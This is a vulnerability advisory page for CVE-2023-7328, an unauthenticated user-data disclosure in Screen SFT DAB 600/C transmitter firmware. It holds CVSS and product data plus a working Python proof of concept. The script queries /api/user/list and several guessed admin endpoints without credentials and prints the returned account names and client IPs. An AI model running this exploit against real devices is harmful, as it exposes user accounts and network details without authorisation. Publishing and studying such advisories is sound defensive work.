Security Vulnerability Report
CVE-2023-7328 CVSS 5.3 MEDIUM

CVE-2023-7328

Published: 2025-11-14 23:15:44
Last Modified: 2025-12-26 16:45:25

Description

Screen SFT DAB 600/C firmware versions up to and including 1.9.3 contain an improper access control flaw in the user management API that allows unauthenticated requests to retrieve structured user data, including account names and connection metadata such as client IP addresses and timeout values.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:sft_dab_600\/c_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:sft_dab_600\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE
Screen SFT DAB 600/C firmware <= 1.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
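import sys

import requests

# CVE-2023-7328 PoC - Screen SFT DAB 600/C Unauthenticated Information Disclosure
# Target: Screen SFT DAB 600/C firmware <= 1.9.3
# Vulnerability: Improper Access Control on User Management API (CWE-306)

# Request timeout in seconds used for every probe below.
DEFAULT_TIMEOUT = 10

# Endpoints probed by enumerate_users(); only the second one is the endpoint
# exploit_cve_2023_7328() itself requests.
USER_ENDPOINTS = [
    "/api/users",
    "/api/user/list",
    "/api/admin/users",
    "/api/v1/users",
    "/user/list",
    "/admin/user/list",
]


def exploit_cve_2023_7328(target_ip, target_port=80, *, timeout=DEFAULT_TIMEOUT):
    """Request the user management API without credentials and return its JSON.

    The check is a single unauthenticated GET to ``/api/user/list`` carrying the
    User-Agent ``Mozilla/5.0 (compatible; CVE-2023-7328-PoC)``; an HTTP 200 with
    a JSON body is treated as confirmation. For defenders, that same request
    line and User-Agent in the device's HTTP log is the detection artefact
    for this check.

    Args:
        target_ip: Host name or IP address of the device.
        target_port: HTTP port of the device web interface (default 80).
        timeout: Socket timeout in seconds for the request.

    Returns:
        The decoded JSON body on a 200 response, or ``None`` when the request
        failed, returned a non-200 status, or the body was not valid JSON.
    """
    url = f"http://{target_ip}:{target_port}/api/user/list"
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2023-7328-PoC)",
        "Accept": "application/json",
    }
    try:
        # No Authorization header or session cookie is sent on purpose: the
        # finding is that the endpoint answers without either.
        response = requests.get(url, headers=headers, timeout=timeout)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")
        return None

    if response.status_code != 200:
        print(f"[-] Request failed with status code: {response.status_code}")
        return None

    print("[+] Successfully accessed user management API")
    print(f"[+] Response Status: {response.status_code}")
    print(f"[+] Response Content-Type: {response.headers.get('Content-Type')}")
    print("[+] Retrieved User Data:")
    print(response.text)
    try:
        # A 200 with a non-JSON body (e.g. an HTML login page) used to raise
        # out of this function; report it as "not disclosed" instead.
        return response.json()
    except ValueError:
        print("[-] Response body is not valid JSON")
        return None


def enumerate_users(target_ip, target_port=80, *, timeout=DEFAULT_TIMEOUT):
    """Probe each path in USER_ENDPOINTS without credentials.

    Every path is fetched with a plain unauthenticated GET; a 200 response is
    recorded together with its raw body. Connection-level failures for one
    path are skipped so the remaining paths are still checked.

    Args:
        target_ip: Host name or IP address of the device.
        target_port: HTTP port of the device web interface (default 80).
        timeout: Socket timeout in seconds per request.

    Returns:
        A list of ``{"endpoint": path, "data": body_text}`` dicts, one per path
        that answered 200; empty when none did.
    """
    results = []
    for endpoint in USER_ENDPOINTS:
        url = f"http://{target_ip}:{target_port}{endpoint}"
        try:
            response = requests.get(url, timeout=timeout)
        except requests.exceptions.RequestException:
            # Best-effort probe: an unreachable or timing-out path is simply
            # not reported (the original swallowed every exception here).
            continue
        if response.status_code == 200:
            results.append({"endpoint": endpoint, "data": response.text})
    return results


def _main(argv):
    """Parse ``<target_ip> [port]`` from *argv* and run the single-endpoint check."""
    if len(argv) < 2:
        print("Usage: python cve_2023_7328_poc.py <target_ip> [port]")
        return 1
    target = argv[1]
    try:
        port = int(argv[2]) if len(argv) > 2 else 80
    except ValueError:
        # A non-numeric port previously produced a traceback.
        print("Usage: python cve_2023_7328_poc.py <target_ip> [port]")
        return 1
    exploit_cve_2023_7328(target, port)
    return 0


if __name__ == "__main__":
    sys.exit(_main(sys.argv))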

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-7328", "sourceIdentifier": "[email protected]", "published": "2025-11-14T23:15:43.640", "lastModified": "2025-12-26T16:45:24.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Screen SFT DAB 600/C firmware versions up to and including 1.9.3 contain an improper access control on the user management API allows unauthenticated requests to retrieve structured user data, including account names and connection metadata such as client IP and timeout values."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:sft_dab_600\\/c_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.9.3", "matchCriteriaId": "1C26364A-87B1-456E-833E-72133B747E78"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:sft_dab_600\\/c:-:*:*:*:*:*:*:*", "matchCriteriaId": "97E91C9F-B55C-4B1A-BE03-D1F03AC90FE5"}]}]}], "references": [{"url": "https://packetstormsecurity.com/files/172332/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51460", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/screen-sft-dab-600c-unauthenticated-information-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51460", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": 
["Exploit"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}